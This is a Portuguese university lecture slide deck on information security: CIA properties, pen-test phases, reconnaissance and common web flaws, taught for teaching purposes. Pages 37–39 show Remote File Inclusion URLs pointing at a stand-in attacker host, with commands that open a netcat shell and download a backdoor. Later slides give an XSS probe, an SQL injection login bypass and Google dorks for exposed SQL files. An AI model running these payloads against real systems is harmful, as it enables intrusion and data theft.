aula8

56
Gerência de Redes de Computadores Gerência de Redes de Computadores Prof. Jordan M. Bonagura

Upload: biangel79

Post on 24-Oct-2014

23 views

Category:

Documents


3 download

TRANSCRIPT

Page 1: Aula8

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 2: Aula8

Definição: Segurança

Segundo o dicionário da Wikipédia, o termo segurança significa:

1. Condição ou estado de estar seguro ou protegido.

2. Capacidade de manter seguro.

3. Proteção contra a fuga ou escape.

4. Profissional ou serviço responsável pela guarda e proteção de algo.

5. Confiança em si mesmo.

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 3: Aula8

Definição: Informação

Segundo a norma ISO 27002, ”A informação é um ativo que, como qualquer outro

ativo importante, é essencial para os negócios da empresa e conseqüentemente

necessita ser adequadamente protegida”.

http://www.abntcatalogo.com.br/norma.aspx?ID=1532

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 4: Aula8

Definição: Segurança da Informação

Portanto, podemos concluir que a Segurança da Informação, está relacionada com a

proteção de um conjunto de informação, no sentido de preservar o valor que

estes possuem para um indivíduo ou para uma organização.

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 5: Aula8

Propriedades da Segurança da Informação

São características básicas da segurança da informação os atributos de

Confidencialidade, Integridade e Disponibilidade, não estando está segurança

restrita somente a sistemas computacionais, informações eletrônicas ou sistemas de

armazenamento.

Este conceito se aplica a todos os aspectos de proteção de informações e dados,

incluindo os sistemas em si.

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 6: Aula8

Propriedades da Segurança da Informação

CONFIDENCIALIDADE - propriedade que limita o acesso a informação tão somente

às entidades legítimas, ou seja, àquelas autorizadas pelo proprietário da informação.

INTEGRIDADE - propriedade que garante que a informação manipulada mantenha

todas as características originais estabelecidas pelo proprietário da informação,

incluindo controle de mudanças e a garantia do seu ciclo de vida.

DISPONIBILIDADE - propriedade que garante que a informação esteja sempre

disponível para o uso legítimo, ou seja, por aqueles utilizadores autorizados pelo

proprietário da informação.

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 7: Aula8

Propriedades da Segurança da Informação

O nível de segurança desejado está diretamente relacionado a uma política de

segurança que é seguida pela organização, para garantir que uma vez estabelecidos

os princípios, aquele nível desejado seja perseguido e mantido.

PARADIGMA:

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 8: Aula8

Terminologias: Segurança

VULNERABILIDADE - Fragilidade de software, hardware ou procedimento que

pode fornecer a um atacante a maneira para entrar em um computador ou rede e

ganhar acesso às informações do ambiente.

AMEAÇA - Agente ou ação, espontâneo ou proposital, que aproveita das vulnerabilidades

de um ambiente para conseguir seu intento.

RISCO – Calculado considerando o nível de impacto e a probabilidade de uma ameaça

ATAQUE – Incidência da ameaça sobre a vulnerabilidade.

EXPLOIT – Programa capaz de explorar uma vulnerabilidade.

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 9: Aula8

Terminologias: Segurança

Exemplo de vulnerabilidade:

“Uso de protocolos inseguros para transmissão dos dados.”

Exemplo de ameaça:

“Um funcionário insatisfeito com a empresa.”

Exemplo de ataque:

“O usuário insatisfeito capturando o tráfego de rede.”

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 10: Aula8

Dados Estatísticos

De acordo com a pesquisa elaborada pelo Computer Security Institute em 2008, mais

de 70% dos ataques partem de utilizadores legítimos de sistemas de informação, ou

seja, os famosos “Insiders”.

Fonte: http://www.gocsi.com/

Interno (70% dos ataques) Externo

Funcionários Insatisfeitos;

Funcionários Despreparados;

Espionagem

Crackers

Concorrentes;

Espionagem.

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 11: Aula8

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 12: Aula8

Dados Estatísticos – Abril a Junho de 2009

http://www.cert.br/

http://www.honeypots-alliance.org.br/stats/

Incidentes em que ocorre uma tentativa de acesso

Varreduras em redes.

Propagação de códigos automatizados

Desfiguração de páginas ou comprometimento servidores

Ataque bem sucedido

Ataque de negação de serviço

Outros tipos

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 13: Aula8

Dados Estatísticos – 1º Semestre de 2009

Breach Security Labs - http:// www.breach.com/resources/breach-security-labs/

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 14: Aula8

Dados Estatísticos – 1º Semestre de 2009

Breach Security Labs - http:// www.breach.com/resources/breach-security-labs/

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 15: Aula8

Dados Estatísticos – 1º Semestre de 2009

Breach Security Labs - http:// www.breach.com/resources/breach-security-labs/

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 16: Aula8

Mecanismos de Segurança

Controles Físicos - são barreiras que limitam o contato ou acesso direto a

informação, ou a infra-estrutura que a suporta.

Ex.:

Portas;

Trancas;

Paredes;

Blindagem;

Câmeras;

Guardas.

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 17: Aula8

Mecanismos de Segurança

Controles Lógicos - são barreiras que impedem ou limitam (controlam), de acordo

com os padrões pré estabelecidos, o acesso a informação.

Ex.:

Criptografia;

Firewall;

Anti Vírus;

IDS / IPS;

Anti Spam;

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 18: Aula8

Mecanismos de Segurança

Além de dispositivos de segurança, também existem diversos serviços relacionados a

segurança da informação.

Ex.:

Criação de Políticas de Segurança;

Hardening de Servidores;

Análise de Vulnerabilidades;

Teste de Intrusão (Pen Test);

Análise de Aplicações (Testes);

Treinamento de Colaboradores.

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 19: Aula8

Procedimentos de um Pen Test

Os procedimentos realizados por um profissional de Pen Test são muito similares aos

procedimentos realizados pelos Crackers, porém com diferentes éticas e intenções.

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 20: Aula8

1. Levantamento de Informações

Nesta fase emprega-se aproximadamente 90% do tempo gasto em uma análise

de segurança (Pen Test).

Nesta etapa, o principal objetivo do profissional é conseguir o maior número de

informações sobre o alvo, para somente então, começar a planejar a melhor

maneira de sua intrusão.

Quanto maior o tempo empregado nesta fase, maior a probabilidade de

sucesso na fase de acesso.

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Fonte: Certificação de Hacker Ético

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 21: Aula8

1. Levantamento de Informações

Nesta fase procura-se conhecer:

Informações sobre a organização ou pessoa alvo;

Informações sobre os servidores da organização;

Informações sobre os funcionários da organização;

Informações sobre os amigos e pessoas chaves da organização;

Endereços de e-mail, telefones e nº de registro (crachá);

Sistemas e equipamentos utilizados (parcerias);

Qualquer outra informação relacionada com o negócio.

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 22: Aula8

2. Varreduras

Nesta etapa, o profissional se utiliza das informações descobertas na fase

anterior e as usa para examinar a rede de maneira direcionada, conduzindo

uma série de “buscas”, com a finalidade de obter as versões de sistemas e

serviços que possam ser explorados, ou seja, que possam estar vulneráveis.

Nesta fase procura-se conhecer:

Sistemas operacionais utilizados e suas versões;

Serviços utilizados e suas versões;

Existência de IDS/IPS, firewalls e outros controles de segurança.

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 23: Aula8

3. Ganhando Acesso

Nesta fase, é onde a invasão realmente ocorre.

Através das informações obtidas nas fases anteriores, fazem possíveis a descoberta

de vulnerabilidades que agora podem ser exploradas para obter acesso ao sistema.

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 24: Aula8

4. Mantendo Acesso e 5. Limpando Rastros

Estas duas fases são as que basicamente diferenciam os profissionais de Pen Test

dos Crackers, pois um profissional autorizado (pen test), não precisará manter

acesso ao equipamento, nem mesmo efetuar a limpeza de registros, uma vez que já

efetuou os serviços contratados e relatará todos os problemas diagnosticados ao seu

cliente.

Obs.: Porém, é de extrema importante que este profissional verifique tanto

possibilidade de criação de um ambiente para futuros acessos.

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 25: Aula8

Obtendo Informações

Obtendo Informações do Domínio

Ex.: Comando whois e/ou visita ao site http://www.registro.br

Neste momento conseguimos obter quais informações??

Nome e IP dos servidores DNS;

Nome do Responsável pelo domínio;

Datas de alteração e criação;

Usuário - E-mail;

CNPJ.

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 26: Aula8

Obtendo Informações • Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Obtendo Informações do Domínio

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 27: Aula8

Obtendo Informações • Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Obtendo Informações do Domínio

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 28: Aula8

Obtendo Informações • Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Obtendo Informações do Domínio

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 29: Aula8

Obtendo Informações

Detecção do Sistema Operacional

Ex.: Comando Ping (ICMP) / Simples conexão ftp / Ferramenta: sing/ xprobe2/hping

$ ping 192.168.200.254 PING 192.168.200.254 (192.168.200.254) 56(84) bytes of data. 64 bytes from 192.168.200.254: icmp_seq=1 ttl=64 time=0.229 ms --- 192.168.200.254 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 1999ms rtt min/avg/max/mdev = 0.191/0.220/0.240/0.021 ms $

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 30: Aula8

Obtendo Informações

Detecção do Sistema Operacional

Ex.: Ping (ICMP)

Cyclades - Normalmente 30

Linux - Normalmente 64

Windows - Normalmente 128

Cisco - Normalmente 255

Linux + iptables - Normalmente 255

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 31: Aula8

Obtendo Informações

Sites Antigos

Ex.: site http://www.archive.org

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 32: Aula8

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades Vulnerabilidades em Aplicações Web

Jordan M. Bonagura

Data: 12/11/2009

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 33: Aula8

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades Vulnerabilidades em Aplicações Web

Jordan M. Bonagura

Data: 12/11/2009

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 34: Aula8

Entendo a aplicação WEB

Aplicações web são programas que ficam em um servidor web e executam tarefas

para dar uma resposta ao usuário.

Webmails, web fóruns e blogs são bons exemplos de aplicações web.

Uma aplicação web utiliza uma arquitetura cliente/servidor.

Melhor exemplificando:

Com um navegador web, o cliente acessa o servidor onde a aplicação(página) está

armazenada (Web Server).

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 35: Aula8

Entendo a aplicação WEB

Com a exploração de uma aplicação web é possível ganhar acesso a informações

confidenciais.

Aplicações web são críticas para a segurança, pois usualmente elas estão

conectadas com uma base de dados que muitas vezes contém informações

sigilosas do negócio ou mesmo de seus clientes (dados financeiros,

senhas, etc).

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 36: Aula8

Principais Vulnerabilidades WEB;

Conteúdo

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 37: Aula8

PHP Injection

Mais conhecida como Remote File Inclusion (RFI) ou Inclusão de arquivo remota,

essa falha permite que um usuário malicioso execute seu próprio arquivo PHP no

website vulnerável.

Exemplo de um arquivo (index.php) vulnerável:

include($page);

http://www.site.com.br/index.php?page=archive.php (Chamada Normal)

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 38: Aula8

PHP Injection

(Chamada Maliciosa)

http://www.site.com.br/index.php?page=http://www.host.atacante/arquivo.php

Dessa forma o atacante consegue inserir um arquivo que ele controla, podendo usar

funções maliciosas dentro desse arquivo, como por exemplo a função system(), que

será executada no servidor vulnerável, e conseqüentemente executará os comandos

que o atacante desejar.

Exemplo do arquivo PHP (arquivo.php) do atacante:

system($cmd);

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 39: Aula8

PHP Injection

(Chamada Maliciosa)

http://www.site.com.br/index.php?page=http://www.host.atacante/arquivo.php&cm

d=nc –l –p 4141 –e /bin/sh

http://www.site.com.br/index.php?page=http://www.host.atacante/arquivo.php&cm

d=wget www.packetstormsecurity.com/bd.pl -O /tmp/bd.pl

http://www.site.com.br/index.php?page=http://www.host.atacante/arquivo.php&cm

d=ls

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 40: Aula8

PHP Injection

Falhas dessa classe ocorrem simplesmente porque o programador não filtrou o

conteúdo que recebe de um usuário e envia para funções que executam comandos

no sistema, como por exemplo, a função system() do PHP.

Uma vez que um usuário malicioso consegue enviar caracteres de escape (; | > <) e

esses caracteres são enviados para a aplicação vulnerável, o atacante conseguirá

executar os comandos diretamente no servidor.

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 41: Aula8

Cross-Site Scripting (XSS)

Cross-site scripting (XSS) é um tipo de vulnerabilidade de segurança encontrada em

aplicações web que permite inserção de códigos por usuários web maliciosos dentro

das páginas vistas por outros usuários.

Exemplos de código incluem HTML, Java Script e outros client-side scripts.

Uma das formas mais comum de explorar esse tipo de falha é inserir um formulário

web no site vulnerável para tentar roubar informações.

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 42: Aula8

Cross-Site Scripting (XSS)

Outro ataque típico também visa roubar os dados do cookie do usuário, enviando as

informações para um servidor do atacante.

Exemplo de uma vulnerabilidade usando as Query Strings de uma página: http://site.com/default.aspx?parametro=<script>alert('Olá%20Teste!');</script>

Se obter a mensagem JavaScript “Olá Teste” significa uma falha de segurança.

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 43: Aula8

Cross-Site Scripting (XSS)

XSS também é amplamente usado para Phishing, na tentativa de dar mais valor a

informação fraudulenta que foi enviada para o alvo, pois o alvo verá uma fonte

confiável (site vulnerável).

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 44: Aula8

SQL Injection

SQL Injection é um problema que ocorre quando o programa não filtra caracteres

especiais enviados pelo usuário antes de fazer a requisição para o banco de dados

enviando caracteres que serão interpretados pelo banco de dados.

SQL Injection é a vulnerabilidade mais comum em aplicações web.

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 45: Aula8

SQL Injection

Analisando o trecho de código abaixo:

Select * from usuarios where username = „” + username + “‟ and password = „” +

password “‟;

Como ficaria a chamada no banco de dados se enviássemos no username e

password o conteúdo: „ or „1‟=„1 ?

Select * from usuarios where username = „‟ or „1‟=„1‟ and password = „‟ or „1‟=„1‟;

Como 1 é sempre igual a 1, teremos uma “verdade” e passaremos pela checagem.

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 46: Aula8

Google Hacking

Google Hacking é a atividade de usar recursos de busca do site, visando atacar ou

melhor proteger as informações de uma empresa.

As informações disponíveis nos servidores web da empresa provavelmente estarão nas

bases de dados do Google.

Um servidor mal configurado pode expor diversas informações da empresa no Google.

Não é difícil conseguir acesso a arquivos de base de dados de sites através do Google.

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 47: Aula8

Google Hacking

Exemplo: site:gov.br ext:sql

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 48: Aula8

Google Hacking

Detectando sistemas que usando a porta 8080

inurl:8080 -intext:8080

Encontrando VNC

intitle:VNC inurl:5800 intitle:VNC ou intitle:"VNC Viewer for Java“

Encontrando Apache 1.3.20: "Apache/1.3.20 server at" intitle:index.of

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 49: Aula8

Denial of Service (DoS)

De acordo com a definição do CERT (Computer Emergency Response Team), os

ataques DoS (Denial of Service), também denominados Ataques de Negação de

Serviços, consistem em tentativas de impedir usuários legítimos de utilizarem um

determinado serviço de um computador.

Para isso, são usadas técnicas que podem:

sobrecarregar uma rede a tal ponto em que os verdadeiros usuários dela não

consigam usá-la;

Fazer tantas requisições a um site até que este não consiga mais ser acessado;

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 50: Aula8

Denial of Service (DoS)

É importante frisar que quando um computador/site sofre ataque DoS, ele não é

invadido, mas sim sobrecarregado.

Isso independe do sistema operacional utilizado.

Uma das formas de ataque mais conhecidas é a SYN Flooding, onde um computador

tenta estabelecer uma conexão com um servidor através de um sinal do TCP

conhecido por SYN (Synchronize).

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 51: Aula8

Denial of Service (DoS)

Se o servidor atender o pedido de conexão, enviará ao computador solicitante um

sinal chamado ACK (Acknowledgement).

O problema é que em ataques desse tipo, o servidor não consegue responder a

todas as solicitações e então passa a recusar novos pedidos.

Outra forma de ataque comum é o Packet Storm, onde um computador faz

solicitações constantes para que uma máquina remota envie pacotes de respostas

ao solicitante.

A máquina fica tão sobrecarregada que não consegue executar suas funções.

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 52: Aula8

Distributed Denial of Service (DDoS)

O DDoS, sigla para Distributed Denial of Service, é um ataque DoS ampliado, ou

seja, que utiliza até milhares de computadores para atacar um determinado alvo.

Esse é um dos tipos mais eficazes de ataques e já prejudicou sites conhecidos, tais

como os da CNN, Amazon, Yahoo, Microsoft e eBay.

Para que os ataques do tipo DDoS sejam bem-sucedidos, é necessário que se

tenha um número grande de computadores para fazerem parte do ataque. Uma das

melhores formas encontradas para se ter tantas máquinas, foi inserir programas de

ataque DDoS em vírus ou em softwares maliciosos.

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 53: Aula8

Distributed Denial of Service (DDoS)

Fonte: www.4linux.com.br

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 54: Aula8

Distributed Denial of Service (DDoS)

Como exemplo real de ataques DDoS ajudados por vírus, tem-se os casos das

pragas digitais Codered, Slammer e MyDoom.

Existem outros, mas estes são os que conseguiram os maiores ataques já realizado

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 55: Aula8

Descuido

Navegando no site.

Ex.: www.kernel.org

Neste site conseguimos obter quais informações??

E-mails válidos;

Um endereço para acompanhar as estatísticas dos servidores;

Uma lista com tecnologias e fornecedores.

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura

Page 56: Aula8

Descuido

Listagem de Diretórios

Demonstração de campos e valores na barra de endereço

Arquivos Antigos / Backup

Extrações de Banco de Dados

Usuários e Senhas Padrões

Usuários e Senhas “fracas” (Brute Force)

Demonstração de Versões/Sistemas que estão sendo utilizados. (Apache / FTP /

Webmail)

Gerência de Redes de Computadores

Gerência de Redes de Computadores

Prof. Jordan M. Bonagura